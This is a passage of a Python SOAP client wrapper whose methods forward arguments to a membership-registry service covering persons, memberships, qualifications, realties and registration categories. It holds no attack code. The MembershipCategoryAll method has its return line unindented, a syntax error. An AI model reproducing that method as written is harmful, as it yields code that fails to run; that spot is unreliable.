    return self._client.service.PersonAllRegistrationCategory(payload)
def PersonMistakeReportDelete(self, ID_Login, ID):
    """Delete a person's registration mistake report (SOAP: PersonMistakeReportDelete)."""
    payload = {"ID_Login": ID_Login, "ID": ID}
    return self._client.service.PersonMistakeReportDelete(payload)
# Create a person's registration mistake report.
def PersonMistakeReportInsert(self, ID_Login, ID, ID_Person, ID_Unit, ID_UnitRegistration, ID_Mistake, Person=None, UnitRegistrationNumber=None, Unit=None, Mistake=None, DisplayName=None, ParentComment=None):
    """Forward all arguments as the PersonMistakeReportInsert SOAP payload and return the service response."""
    return self._client.service.PersonMistakeReportInsert({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person, "ID_Unit": ID_Unit, "ID_UnitRegistration": ID_UnitRegistration, "ID_Mistake": ID_Mistake, "Person": Person, "UnitRegistrationNumber": UnitRegistrationNumber, "Unit": Unit, "Mistake": Mistake, "DisplayName": DisplayName, "ParentComment": ParentComment})
def PersonRegistrationAll(self, ID_Login, ID_UnitRegistration, IncludeChild):
    """Load the list of person registrations in a unit (SOAP: PersonRegistrationAll)."""
    payload = {
        "ID_Login": ID_Login,
        "ID_UnitRegistration": ID_UnitRegistration,
        "IncludeChild": IncludeChild,
    }
    return self._client.service.PersonRegistrationAll(payload)
def PersonRegistrationDelete(self, ID_Login, ID, ID_UnitRegistration, ID_Items=None):
    """Delete a person registration (SOAP: PersonRegistrationDelete)."""
    payload = {
        "ID_Login": ID_Login,
        "ID": ID,
        "ID_UnitRegistration": ID_UnitRegistration,
        "ID_Items": ID_Items,
    }
    return self._client.service.PersonRegistrationDelete(payload)
def PersonRegistrationInsert(self, ID_Login, ID_Membership, ID_RegistrationCategory, ID_RegistrationServiceArray=None):
    """Create a person registration (SOAP: PersonRegistrationInsert)."""
    payload = {
        "ID_Login": ID_Login,
        "ID_Membership": ID_Membership,
        "ID_RegistrationCategory": ID_RegistrationCategory,
        "ID_RegistrationServiceArray": ID_RegistrationServiceArray,
    }
    return self._client.service.PersonRegistrationInsert(payload)
def RegistrationCategoryCopyFromParentUnit(self, ID_Login, ID_UnitRegistrationCopy):
    """Copy registration categories from the parent unit's registration (SOAP: RegistrationCategoryCopyFromParentUnit)."""
    payload = {"ID_Login": ID_Login, "ID_UnitRegistrationCopy": ID_UnitRegistrationCopy}
    return self._client.service.RegistrationCategoryCopyFromParentUnit(payload)
def DegreeAll(self, ID_Login, ID_Person, ID_DegreeType):
    """Load a person's academic degrees (SOAP: DegreeAll)."""
    payload = {
        "ID_Login": ID_Login,
        "ID_Person": ID_Person,
        "ID_DegreeType": ID_DegreeType,
    }
    return self._client.service.DegreeAll(payload)
def DegreeDelete(self, ID_Login, ID):
    """Delete a person's academic degree (SOAP: DegreeDelete)."""
    payload = {"ID_Login": ID_Login, "ID": ID}
    return self._client.service.DegreeDelete(payload)
def DegreeInsert(self, ID_Login, ID_Person, ID, ID_DegreeType):
    """Create an academic degree for a person (SOAP: DegreeInsert)."""
    payload = {
        "ID_Login": ID_Login,
        "ID_Person": ID_Person,
        "ID": ID,
        "ID_DegreeType": ID_DegreeType,
    }
    return self._client.service.DegreeInsert(payload)
def DegreeTypeAll(self, ID_Login, ID_Application, ID, DisplayName=None):
    """Load the list of academic degree types (SOAP: DegreeTypeAll)."""
    payload = {
        "ID_Login": ID_Login,
        "ID_Application": ID_Application,
        "ID": ID,
        "DisplayName": DisplayName,
    }
    return self._client.service.DegreeTypeAll(payload)
def DegreeUpdate(self, ID_Login, ID_Person, ID, ID_DegreeType):
    """Update an academic degree of a person (SOAP: DegreeUpdate)."""
    payload = {
        "ID_Login": ID_Login,
        "ID_Person": ID_Person,
        "ID": ID,
        "ID_DegreeType": ID_DegreeType,
    }
    return self._client.service.DegreeUpdate(payload)
def EducationAll(self, ID_Login, ID_Person, ID_EducationType):
    """Load a person's education records (SOAP: EducationAll)."""
    payload = {
        "ID_Login": ID_Login,
        "ID_Person": ID_Person,
        "ID_EducationType": ID_EducationType,
    }
    return self._client.service.EducationAll(payload)
def EducationDelete(self, ID_Login, ID):
    """Delete a person's education record (SOAP: EducationDelete)."""
    payload = {"ID_Login": ID_Login, "ID": ID}
    return self._client.service.EducationDelete(payload)
def EducationInsert(self, ID_Login, ID_Person, ID, ID_EducationType, Note=None):
    """Create an education record for a person (SOAP: EducationInsert)."""
    payload = {
        "ID_Login": ID_Login,
        "ID_Person": ID_Person,
        "ID": ID,
        "ID_EducationType": ID_EducationType,
        "Note": Note,
    }
    return self._client.service.EducationInsert(payload)
def EducationTypeAll(self, ID_Login, DisplayName=None):
    """Load the list of education types (SOAP: EducationTypeAll)."""
    payload = {"ID_Login": ID_Login, "DisplayName": DisplayName}
    return self._client.service.EducationTypeAll(payload)
def EducationUpdate(self, ID_Login, ID_Person, ID, ID_EducationType, Note=None):
    """Update a person's education record (SOAP: EducationUpdate)."""
    payload = {
        "ID_Login": ID_Login,
        "ID_Person": ID_Person,
        "ID": ID,
        "ID_EducationType": ID_EducationType,
        "Note": Note,
    }
    return self._client.service.EducationUpdate(payload)
# Load the list of functions in a unit.
def FunctionAll(self, ID_Login, ID_Person, ID_Unit, ID_FunctionType, IsValid, ShowHistory, IsAgency, ID_Agency, IsStatutory, ID_FunctionReason=None, Person=None):
    """Forward all arguments as the FunctionAll SOAP payload and return the service response."""
    return self._client.service.FunctionAll({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID_Unit": ID_Unit, "ID_FunctionType": ID_FunctionType, "IsValid": IsValid, "ShowHistory": ShowHistory, "IsAgency": IsAgency, "ID_Agency": ID_Agency, "IsStatutory": IsStatutory, "ID_FunctionReason": ID_FunctionReason, "Person": Person})
def FunctionDetail(self, ID_Login, ID):
    """Load the detail of a function (SOAP: FunctionDetail)."""
    payload = {"ID_Login": ID_Login, "ID": ID}
    return self._client.service.FunctionDetail(payload)
# Create a function.
def FunctionInsert(self, ID_Login, ID, ValidFrom, ValidTo, ID_Person, ID_Unit, ID_FunctionType, ID_Role, IsDeleteRole, AgreementConfirmed, ID_TempFile, AgreementNeeded, AgreementCanUpload, AgreementCanConfirm, AgreementCanView, ID_FunctionReason=None, Specification=None, AgreementExtension=None, Code=None, Number=None):
    """Forward all arguments as the FunctionInsert SOAP payload and return the service response."""
    return self._client.service.FunctionInsert({"ID_Login": ID_Login, "ID": ID, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "ID_Person": ID_Person, "ID_Unit": ID_Unit, "ID_FunctionType": ID_FunctionType, "ID_Role": ID_Role, "IsDeleteRole": IsDeleteRole, "AgreementConfirmed": AgreementConfirmed, "ID_TempFile": ID_TempFile, "AgreementNeeded": AgreementNeeded, "AgreementCanUpload": AgreementCanUpload, "AgreementCanConfirm": AgreementCanConfirm, "AgreementCanView": AgreementCanView, "ID_FunctionReason": ID_FunctionReason, "Specification": Specification, "AgreementExtension": AgreementExtension, "Code": Code, "Number": Number})
def FunctionReasonAll(self, ID_Login, DisplayName=None):
    """Load the list of function termination reasons (SOAP: FunctionReasonAll)."""
    payload = {"ID_Login": ID_Login, "DisplayName": DisplayName}
    return self._client.service.FunctionReasonAll(payload)
def FunctionTypeAll(self, ID_Login, ID_Role, IsElective, DisplayName=None, ID_UnitType=None):
    """Load the list of function types (SOAP: FunctionTypeAll)."""
    payload = {
        "ID_Login": ID_Login,
        "ID_Role": ID_Role,
        "IsElective": IsElective,
        "DisplayName": DisplayName,
        "ID_UnitType": ID_UnitType,
    }
    return self._client.service.FunctionTypeAll(payload)
def FunctionTypeDelete(self, ID_Login, ID):
    """Delete a function type (SOAP: FunctionTypeDelete)."""
    payload = {"ID_Login": ID_Login, "ID": ID}
    return self._client.service.FunctionTypeDelete(payload)
def FunctionTypeDetail(self, ID_Login, ID):
    """Load the detail of a function type (SOAP: FunctionTypeDetail)."""
    payload = {"ID_Login": ID_Login, "ID": ID}
    return self._client.service.FunctionTypeDetail(payload)
# Create a function type.
def FunctionTypeInsert(self, ID_Login, ID, ID_Role, MinCount, MaxCount, IsStatutory, IsAssistant, IsAudit, IsOficial, IsElective, IsNotCongress, IsSpecification, ID_Agency, Order, DisplayName=None, Code=None, ID_UnitType=None, Note=None, Agency=None):
    """Forward all arguments as the FunctionTypeInsert SOAP payload and return the service response."""
    return self._client.service.FunctionTypeInsert({"ID_Login": ID_Login, "ID": ID, "ID_Role": ID_Role, "MinCount": MinCount, "MaxCount": MaxCount, "IsStatutory": IsStatutory, "IsAssistant": IsAssistant, "IsAudit": IsAudit, "IsOficial": IsOficial, "IsElective": IsElective, "IsNotCongress": IsNotCongress, "IsSpecification": IsSpecification, "ID_Agency": ID_Agency, "Order": Order, "DisplayName": DisplayName, "Code": Code, "ID_UnitType": ID_UnitType, "Note": Note, "Agency": Agency})
# Update a function type.
def FunctionTypeUpdate(self, ID_Login, ID, ID_Role, MinCount, MaxCount, IsStatutory, IsAssistant, IsAudit, IsOficial, IsElective, IsNotCongress, IsSpecification, ID_Agency, Order, DisplayName=None, Code=None, ID_UnitType=None, Note=None, Agency=None):
    """Forward all arguments as the FunctionTypeUpdate SOAP payload and return the service response."""
    return self._client.service.FunctionTypeUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Role": ID_Role, "MinCount": MinCount, "MaxCount": MaxCount, "IsStatutory": IsStatutory, "IsAssistant": IsAssistant, "IsAudit": IsAudit, "IsOficial": IsOficial, "IsElective": IsElective, "IsNotCongress": IsNotCongress, "IsSpecification": IsSpecification, "ID_Agency": ID_Agency, "Order": Order, "DisplayName": DisplayName, "Code": Code, "ID_UnitType": ID_UnitType, "Note": Note, "Agency": Agency})
# Update a function.
def FunctionUpdate(self, ID_Login, ID, ValidFrom, ValidTo, ID_Person, ID_Unit, ID_FunctionType, ID_Role, IsDeleteRole, AgreementConfirmed, ID_TempFile, AgreementNeeded, AgreementCanUpload, AgreementCanConfirm, AgreementCanView, ID_FunctionReason=None, Specification=None, AgreementExtension=None, Code=None, Number=None):
    """Forward all arguments as the FunctionUpdate SOAP payload and return the service response."""
    return self._client.service.FunctionUpdate({"ID_Login": ID_Login, "ID": ID, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "ID_Person": ID_Person, "ID_Unit": ID_Unit, "ID_FunctionType": ID_FunctionType, "ID_Role": ID_Role, "IsDeleteRole": IsDeleteRole, "AgreementConfirmed": AgreementConfirmed, "ID_TempFile": ID_TempFile, "AgreementNeeded": AgreementNeeded, "AgreementCanUpload": AgreementCanUpload, "AgreementCanConfirm": AgreementCanConfirm, "AgreementCanView": AgreementCanView, "ID_FunctionReason": ID_FunctionReason, "Specification": Specification, "AgreementExtension": AgreementExtension, "Code": Code, "Number": Number})
def MembershipAllUnitUpdate(self, ID_Login, ID_Unit, OnlyDirectMember, LastValidOnly):
    """Load unit memberships eligible for update (SOAP: MembershipAllUnitUpdate)."""
    payload = {
        "ID_Login": ID_Login,
        "ID_Unit": ID_Unit,
        "OnlyDirectMember": OnlyDirectMember,
        "LastValidOnly": LastValidOnly,
    }
    return self._client.service.MembershipAllUnitUpdate(payload)
# Načíst seznam výchovných kategorií
def MembershipCategoryAll(self, ID_Login, Age, ID_Unit, ID=None, DisplayName=None, ID_Sex=None):
return self._client.service.MembershipCategoryAll({"ID_Login": ID_Login, "Age": Age, "ID_Unit": ID_Unit, "ID": ID, "DisplayName": DisplayName, "ID_Sex": ID_Sex})
def MembershipDetail(self, ID_Login, ID):
    """Load the detail of a person's membership in a unit (SOAP: MembershipDetail)."""
    payload = {"ID_Login": ID_Login, "ID": ID}
    return self._client.service.MembershipDetail(payload)
# Create a person's membership in a unit.
def MembershipInsert(self, ID_Login, ID, ID_Unit, ID_Person, ID_User, ValidFrom, ValidTo, IsUnique, CreateNew, OnlyValidate, IsFunction, IsUnitFunction, IsSts, IsDelegate, PersonDateBirth, Person=None, ID_MembershipType=None, ID_MembershipCategory=None, ID_MembershipReason=None):
    """Forward all arguments as the MembershipInsert SOAP payload and return the service response."""
    return self._client.service.MembershipInsert({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_Person": ID_Person, "ID_User": ID_User, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "IsUnique": IsUnique, "CreateNew": CreateNew, "OnlyValidate": OnlyValidate, "IsFunction": IsFunction, "IsUnitFunction": IsUnitFunction, "IsSts": IsSts, "IsDelegate": IsDelegate, "PersonDateBirth": PersonDateBirth, "Person": Person, "ID_MembershipType": ID_MembershipType, "ID_MembershipCategory": ID_MembershipCategory, "ID_MembershipReason": ID_MembershipReason})
def MembershipReasonAll(self, ID_Login, IsMulti, ID=None, DisplayName=None):
    """Load the list of membership change/termination reasons (SOAP: MembershipReasonAll)."""
    payload = {
        "ID_Login": ID_Login,
        "IsMulti": IsMulti,
        "ID": ID,
        "DisplayName": DisplayName,
    }
    return self._client.service.MembershipReasonAll(payload)
def MembershipTypeAll(self, ID_Login, DisplayName=None):
    """Load the list of membership types (SOAP: MembershipTypeAll)."""
    payload = {"ID_Login": ID_Login, "DisplayName": DisplayName}
    return self._client.service.MembershipTypeAll(payload)
# Update a person's membership in a unit.
def MembershipUpdate(self, ID_Login, ID, ID_Unit, ID_Person, ID_User, ValidFrom, ValidTo, IsUnique, CreateNew, OnlyValidate, IsFunction, IsUnitFunction, IsSts, IsDelegate, PersonDateBirth, Person=None, ID_MembershipType=None, ID_MembershipCategory=None, ID_MembershipReason=None):
    """Forward all arguments as the MembershipUpdate SOAP payload and return the service response."""
    return self._client.service.MembershipUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_Person": ID_Person, "ID_User": ID_User, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "IsUnique": IsUnique, "CreateNew": CreateNew, "OnlyValidate": OnlyValidate, "IsFunction": IsFunction, "IsUnitFunction": IsUnitFunction, "IsSts": IsSts, "IsDelegate": IsDelegate, "PersonDateBirth": PersonDateBirth, "Person": Person, "ID_MembershipType": ID_MembershipType, "ID_MembershipCategory": ID_MembershipCategory, "ID_MembershipReason": ID_MembershipReason})
# Load the list of realty occupations (unit usage of real estate).
def OccupationAll(self, ID_Login, ID_Application, ID_Unit, IncludeChildUnits, ID_Realty, Publish, ID_RealtyType, Distance, GpsLatitude, GpsLongitude, GpsLatitudeStart, GpsLongitudeStart, GpsLatitudeEnd, GpsLongitudeEnd, AdvertisingCategories=None):
    """Forward all arguments as the OccupationAll SOAP payload and return the service response."""
    return self._client.service.OccupationAll({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID_Unit": ID_Unit, "IncludeChildUnits": IncludeChildUnits, "ID_Realty": ID_Realty, "Publish": Publish, "ID_RealtyType": ID_RealtyType, "Distance": Distance, "GpsLatitude": GpsLatitude, "GpsLongitude": GpsLongitude, "GpsLatitudeStart": GpsLatitudeStart, "GpsLongitudeStart": GpsLongitudeStart, "GpsLatitudeEnd": GpsLatitudeEnd, "GpsLongitudeEnd": GpsLongitudeEnd, "AdvertisingCategories": AdvertisingCategories})
def OccupationDelete(self, ID_Login, ID):
    """Delete a realty occupation (SOAP: OccupationDelete)."""
    payload = {"ID_Login": ID_Login, "ID": ID}
    return self._client.service.OccupationDelete(payload)
def OccupationDetail(self, ID_Login, ID):
    """Load the detail of a realty occupation (SOAP: OccupationDetail)."""
    payload = {"ID_Login": ID_Login, "ID": ID}
    return self._client.service.OccupationDetail(payload)
def OccupationInsert(self, ID_Login, ID, ID_Unit, ID_Realty, Publish, ID_RealtyType, Note=None, RealtyType=None):
    """Create a realty occupation (SOAP: OccupationInsert)."""
    payload = {
        "ID_Login": ID_Login,
        "ID": ID,
        "ID_Unit": ID_Unit,
        "ID_Realty": ID_Realty,
        "Publish": Publish,
        "ID_RealtyType": ID_RealtyType,
        "Note": Note,
        "RealtyType": RealtyType,
    }
    return self._client.service.OccupationInsert(payload)
def OccupationUpdate(self, ID_Login, ID, ID_Unit, ID_Realty, Publish, ID_RealtyType, Note=None, RealtyType=None):
    """Update a realty occupation (SOAP: OccupationUpdate)."""
    payload = {
        "ID_Login": ID_Login,
        "ID": ID,
        "ID_Unit": ID_Unit,
        "ID_Realty": ID_Realty,
        "Publish": Publish,
        "ID_RealtyType": ID_RealtyType,
        "Note": Note,
        "RealtyType": RealtyType,
    }
    return self._client.service.OccupationUpdate(payload)
def OfferAll(self, ID_Login, ID_Person, ID_OfferType, ShowHistory):
    """Load the list of activity offers (SOAP: OfferAll)."""
    payload = {
        "ID_Login": ID_Login,
        "ID_Person": ID_Person,
        "ID_OfferType": ID_OfferType,
        "ShowHistory": ShowHistory,
    }
    return self._client.service.OfferAll(payload)
def OfferDelete(self, ID_Login, ID):
    """Delete an activity offer (SOAP: OfferDelete)."""
    payload = {"ID_Login": ID_Login, "ID": ID}
    return self._client.service.OfferDelete(payload)
def OfferInsert(self, ID_Login, ID_Person, ID, ID_OfferType, Note=None):
    """Create an activity offer (SOAP: OfferInsert)."""
    payload = {
        "ID_Login": ID_Login,
        "ID_Person": ID_Person,
        "ID": ID,
        "ID_OfferType": ID_OfferType,
        "Note": Note,
    }
    return self._client.service.OfferInsert(payload)
def OfferTypeAll(self, ID_Login, DisplayName=None):
    """Load the list of activity types (SOAP: OfferTypeAll)."""
    payload = {"ID_Login": ID_Login, "DisplayName": DisplayName}
    return self._client.service.OfferTypeAll(payload)
def OfferUpdate(self, ID_Login, ID_Person, ID, ID_OfferType, Note=None):
    """Update an activity offer (SOAP: OfferUpdate)."""
    payload = {
        "ID_Login": ID_Login,
        "ID_Person": ID_Person,
        "ID": ID,
        "ID_OfferType": ID_OfferType,
        "Note": Note,
    }
    return self._client.service.OfferUpdate(payload)
# Load the list of persons.
def PersonAll(self, ID_Login, ID, ID_Unit, OnlyDirectMember, ID_FunctionType, ID_QualificationType, DisplayName=None, ID_Sex=None, IdentificationCode=None, FirstName=None, LastName=None, SecurityCode=None, IdentificationCodeStartsWith=None, RegistrationNumber=None):
    """Forward all arguments as the PersonAll SOAP payload and return the service response."""
    return self._client.service.PersonAll({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "OnlyDirectMember": OnlyDirectMember, "ID_FunctionType": ID_FunctionType, "ID_QualificationType": ID_QualificationType, "DisplayName": DisplayName, "ID_Sex": ID_Sex, "IdentificationCode": IdentificationCode, "FirstName": FirstName, "LastName": LastName, "SecurityCode": SecurityCode, "IdentificationCodeStartsWith": IdentificationCodeStartsWith, "RegistrationNumber": RegistrationNumber})
def PersonContactAll(self, ID_Login, ID_Person, IsCatalog, IsMain, IsHidden, ID_ContactType=None):
    """Load a person's contacts (SOAP: PersonContactAll)."""
    payload = {
        "ID_Login": ID_Login,
        "ID_Person": ID_Person,
        "IsCatalog": IsCatalog,
        "IsMain": IsMain,
        "IsHidden": IsHidden,
        "ID_ContactType": ID_ContactType,
    }
    return self._client.service.PersonContactAll(payload)
def PersonContactDelete(self, ID_Login, ID):
    """Delete a person's contact (SOAP: PersonContactDelete)."""
    payload = {"ID_Login": ID_Login, "ID": ID}
    return self._client.service.PersonContactDelete(payload)
# Create a person's contact.
def PersonContactInsert(self, ID_Login, ID_Person, ID, IsGa, IsCatalog, IsHidden, ID_ContactType=None, Value=None, Note=None):
    """Forward all arguments as the PersonContactInsert SOAP payload and return the service response."""
    return self._client.service.PersonContactInsert({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID": ID, "IsGa": IsGa, "IsCatalog": IsCatalog, "IsHidden": IsHidden, "ID_ContactType": ID_ContactType, "Value": Value, "Note": Note})
# Update a person's contact.
def PersonContactUpdate(self, ID_Login, ID_Person, ID, IsGa, IsCatalog, IsHidden, ID_ContactType=None, Value=None, Note=None):
    """Forward all arguments as the PersonContactUpdate SOAP payload and return the service response."""
    return self._client.service.PersonContactUpdate({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID": ID, "IsGa": IsGa, "IsCatalog": IsCatalog, "IsHidden": IsHidden, "ID_ContactType": ID_ContactType, "Value": Value, "Note": Note})
# Create a person.
def PersonInsert(self, ID_Login, Birthday, BirthdayYear, IsForeign, YearFrom, ID_User, OnlyValidate, IsPostalAuthenticated, IsAddressAuthenticated, AllowDataStorage, AllowAudiovisual, AllowSocialNetwork, AllowMarketing, IdentificationCodeForce, ID_UnitEnrollTempFile, IdentificationCode=None, FirstName=None, LastName=None, NickName=None, Address=None, Street=None, City=None, Postcode=None, State=None, PostalFirstLine=None, PostalAddress=None, PostalStreet=None, PostalCity=None, PostalPostcode=None, PostalState=None, Note=None, ID_Sex=None, RegistrationNumber=None, PhotoExtension=None, MaidenName=None, AddressDistrict=None, PostalDistrict=None, UnitEnrollExtension=None, UnitEnroll=None):
    """Forward all arguments as the PersonInsert SOAP payload and return the service response."""
    return self._client.service.PersonInsert({"ID_Login": ID_Login, "Birthday": Birthday, "BirthdayYear": BirthdayYear, "IsForeign": IsForeign, "YearFrom": YearFrom, "ID_User": ID_User, "OnlyValidate": OnlyValidate, "IsPostalAuthenticated": IsPostalAuthenticated, "IsAddressAuthenticated": IsAddressAuthenticated, "AllowDataStorage": AllowDataStorage, "AllowAudiovisual": AllowAudiovisual, "AllowSocialNetwork": AllowSocialNetwork, "AllowMarketing": AllowMarketing, "IdentificationCodeForce": IdentificationCodeForce, "ID_UnitEnrollTempFile": ID_UnitEnrollTempFile, "IdentificationCode": IdentificationCode, "FirstName": FirstName, "LastName": LastName, "NickName": NickName, "Address": Address, "Street": Street, "City": City, "Postcode": Postcode, "State": State, "PostalFirstLine": PostalFirstLine, "PostalAddress": PostalAddress, "PostalStreet": PostalStreet, "PostalCity": PostalCity, "PostalPostcode": PostalPostcode, "PostalState": PostalState, "Note": Note, "ID_Sex": ID_Sex, "RegistrationNumber": RegistrationNumber, "PhotoExtension": PhotoExtension, "MaidenName": MaidenName, "AddressDistrict": AddressDistrict, "PostalDistrict": PostalDistrict, "UnitEnrollExtension": UnitEnrollExtension, "UnitEnroll": UnitEnroll})
# Edit a person.
def PersonUpdate(self, ID_Login, ID, Birthday, BirthdayYear, IsForeign, YearFrom, ID_User, OnlyValidate, IsPostalAuthenticated, IsAddressAuthenticated, RejectDataStorage, IdentificationCodeForce, GenerateSecurityCode, ID_TempFile, ID_PersonPhotoBig, ID_PersonPhotoMedium, ID_PersonPhotoNormal, ID_PersonPhotoSmall, IdentificationCode=None, FirstName=None, LastName=None, NickName=None, Address=None, Street=None, City=None, Postcode=None, State=None, PostalFirstLine=None, PostalAddress=None, PostalStreet=None, PostalCity=None, PostalPostcode=None, PostalState=None, Note=None, ID_Sex=None, RegistrationNumber=None, PhotoExtension=None, PhotoContent=None, MaidenName=None, AddressDistrict=None, PostalDistrict=None, UnitEnrollExtension=None, UnitEnroll=None):
    """Forward all arguments as the PersonUpdate SOAP payload and return the service response."""
    return self._client.service.PersonUpdate({"ID_Login": ID_Login, "ID": ID, "Birthday": Birthday, "BirthdayYear": BirthdayYear, "IsForeign": IsForeign, "YearFrom": YearFrom, "ID_User": ID_User, "OnlyValidate": OnlyValidate, "IsPostalAuthenticated": IsPostalAuthenticated, "IsAddressAuthenticated": IsAddressAuthenticated, "RejectDataStorage": RejectDataStorage, "IdentificationCodeForce": IdentificationCodeForce, "GenerateSecurityCode": GenerateSecurityCode, "ID_TempFile": ID_TempFile, "ID_PersonPhotoBig": ID_PersonPhotoBig, "ID_PersonPhotoMedium": ID_PersonPhotoMedium, "ID_PersonPhotoNormal": ID_PersonPhotoNormal, "ID_PersonPhotoSmall": ID_PersonPhotoSmall, "IdentificationCode": IdentificationCode, "FirstName": FirstName, "LastName": LastName, "NickName": NickName, "Address": Address, "Street": Street, "City": City, "Postcode": Postcode, "State": State, "PostalFirstLine": PostalFirstLine, "PostalAddress": PostalAddress, "PostalStreet": PostalStreet, "PostalCity": PostalCity, "PostalPostcode": PostalPostcode, "PostalState": PostalState, "Note": Note, "ID_Sex": ID_Sex, "RegistrationNumber": RegistrationNumber, "PhotoExtension": PhotoExtension, "PhotoContent": PhotoContent, "MaidenName": MaidenName, "AddressDistrict": AddressDistrict, "PostalDistrict": PostalDistrict, "UnitEnrollExtension": UnitEnrollExtension, "UnitEnroll": UnitEnroll})
# Načíst seznam kvalifikací
def QualificationAll(self, ShowHistory, ID_Login, ID_Person, ID_QualificationType, IsValid, QualificationTypeKey=None):
    """Load the list of qualifications (SOAP call ``QualificationAll``)."""
    payload = dict(locals())
    del payload["self"]  # parameters map 1:1 onto request fields
    return self._client.service.QualificationAll(payload)
# Načíst detail kvalifikace
def QualificationDetail(self, ID_Login, ID):
    """Load the detail of a single qualification (SOAP call ``QualificationDetail``)."""
    payload = {"ID_Login": ID_Login, "ID": ID}
    return self._client.service.QualificationDetail(payload)
# Založit kvalifikaci
def QualificationInsert(self, ID_Login, ID_Person, ID, ValidFrom, ValidTo, ID_QualificationType, IsUsed, SendMessage, ID_Document, Person=None, QualificationType=None, LetterNumber=None, Note=None):
    """Create a qualification (SOAP call ``QualificationInsert``)."""
    payload = dict(locals())
    del payload["self"]  # parameters map 1:1 onto request fields
    return self._client.service.QualificationInsert(payload)
# Načíst seznam typů kvalfikace
def QualificationTypeAll(self, ID_Login, IsExam, ShowManualIssue, DisplayName=None):
    """Load the list of qualification types (SOAP call ``QualificationTypeAll``)."""
    payload = {
        "ID_Login": ID_Login,
        "IsExam": IsExam,
        "ShowManualIssue": ShowManualIssue,
        "DisplayName": DisplayName,
    }
    return self._client.service.QualificationTypeAll(payload)
# Upravit kvalifikaci
def QualificationUpdate(self, ID_Login, ID_Person, ID, ValidFrom, ValidTo, ID_QualificationType, IsUsed, SendMessage, ID_Document, Person=None, QualificationType=None, LetterNumber=None, Note=None):
    """Update a qualification (SOAP call ``QualificationUpdate``)."""
    payload = dict(locals())
    del payload["self"]  # parameters map 1:1 onto request fields
    return self._client.service.QualificationUpdate(payload)
# Načíst seznam nemovitostí
def RealtyAll(self, ID_Login, ID, ID_RealtyType, SearchByCity, SearchByName, SearchString=None):
    """Load the list of realties (SOAP call ``RealtyAll``)."""
    payload = dict(locals())
    del payload["self"]  # parameters map 1:1 onto request fields
    return self._client.service.RealtyAll(payload)
# Načíst detail nemovitosti
def RealtyDetail(self, ID_Login, ID):
    """Load the detail of a realty (SOAP call ``RealtyDetail``)."""
    payload = {"ID_Login": ID_Login, "ID": ID}
    return self._client.service.RealtyDetail(payload)
# Založit nemovitost
def RealtyInsert(self, ID_Login, ID, ID_RealtyType, GpsLatitude, GpsLongitude, ID_RealtyCollection, IsPower, ValidTo, IsActive, ID_TempFilePhoto, IsAddressAuthenticated, ID_Document, LVNumber, Acreage, RealtyGpsLatitude, RealtyGpsLongitude, CoordinateX, CoordinateY, DisplayName=None, RealtyType=None, Street=None, City=None, Postcode=None, Description=None, Note=None, RealtyCollection=None, ID_OwnerType=None, OwnerType=None, OwnerTypeNote=None, PhotoExtension=None, PhotoFileContent=None, FotogalleryUrl=None, District=None, Storage=None, ParcelNumber=None, RegisterCity=None, CadastralArea=None, ParcelType=None, LandType=None, Unit=None, UnitRegistrationNumber=None):
    """Create a realty (SOAP call ``RealtyInsert``).

    Forwards every argument under its own name; the request dict mirrors
    the method signature 1:1.
    """
    payload = dict(locals())
    del payload["self"]  # all remaining locals are exactly the SOAP request fields
    return self._client.service.RealtyInsert(payload)
# Načíst seznam typů nemovitostí
def RealtyTypeAll(self, ID_Login, ID_Application, DisplayName=None):
    """Load the list of realty types (SOAP call ``RealtyTypeAll``)."""
    payload = {"ID_Login": ID_Login, "ID_Application": ID_Application, "DisplayName": DisplayName}
    return self._client.service.RealtyTypeAll(payload)
# Upravit nemovitost
def RealtyUpdate(self, ID_Login, ID, ID_RealtyType, GpsLatitude, GpsLongitude, ID_RealtyCollection, IsPower, ValidTo, IsActive, ID_TempFilePhoto, IsAddressAuthenticated, ID_Document, LVNumber, Acreage, RealtyGpsLatitude, RealtyGpsLongitude, CoordinateX, CoordinateY, DisplayName=None, RealtyType=None, Street=None, City=None, Postcode=None, Description=None, Note=None, RealtyCollection=None, ID_OwnerType=None, OwnerType=None, OwnerTypeNote=None, PhotoExtension=None, PhotoFileContent=None, FotogalleryUrl=None, District=None, Storage=None, ParcelNumber=None, RegisterCity=None, CadastralArea=None, ParcelType=None, LandType=None, Unit=None, UnitRegistrationNumber=None):
    """Update a realty (SOAP call ``RealtyUpdate``).

    Forwards every argument under its own name; the request dict mirrors
    the method signature 1:1.
    """
    payload = dict(locals())
    del payload["self"]  # all remaining locals are exactly the SOAP request fields
    return self._client.service.RealtyUpdate(payload)
# Načíst seznam registračních kategorií
def RegistrationCategoryAll(self, ID_Login, ID_UnitRegistration, ID_RegistrationCategoryParent, ShowParentUnit, ShowUsable, IsAfterDeadline, DisplayName=None, ID_MembershipType=None):
    """Load the list of registration categories (SOAP call ``RegistrationCategoryAll``)."""
    payload = dict(locals())
    del payload["self"]  # parameters map 1:1 onto request fields
    return self._client.service.RegistrationCategoryAll(payload)
# Smazat registrační kategorii
def RegistrationCategoryDelete(self, ID_Login, ID):
    """Delete a registration category (SOAP call ``RegistrationCategoryDelete``)."""
    payload = {"ID_Login": ID_Login, "ID": ID}
    return self._client.service.RegistrationCategoryDelete(payload)
# Založit registrační kategorii
def RegistrationCategoryInsert(self, ID_Login, ID_UnitRegistration, ID_RegistrationCategoryParent, Amount, IsAfterDeadline, IsJournal, DisplayName=None, ID_MembershipType=None, Note=None):
    """Create a registration category (SOAP call ``RegistrationCategoryInsert``)."""
    payload = dict(locals())
    del payload["self"]  # parameters map 1:1 onto request fields
    return self._client.service.RegistrationCategoryInsert(payload)
# Načíst seznam pohlaví
def SexAll(self, ID_Login, ID_Application, DisplayName=None):
    """Load the list of sexes (SOAP call ``SexAll``)."""
    payload = {"ID_Login": ID_Login, "ID_Application": ID_Application, "DisplayName": DisplayName}
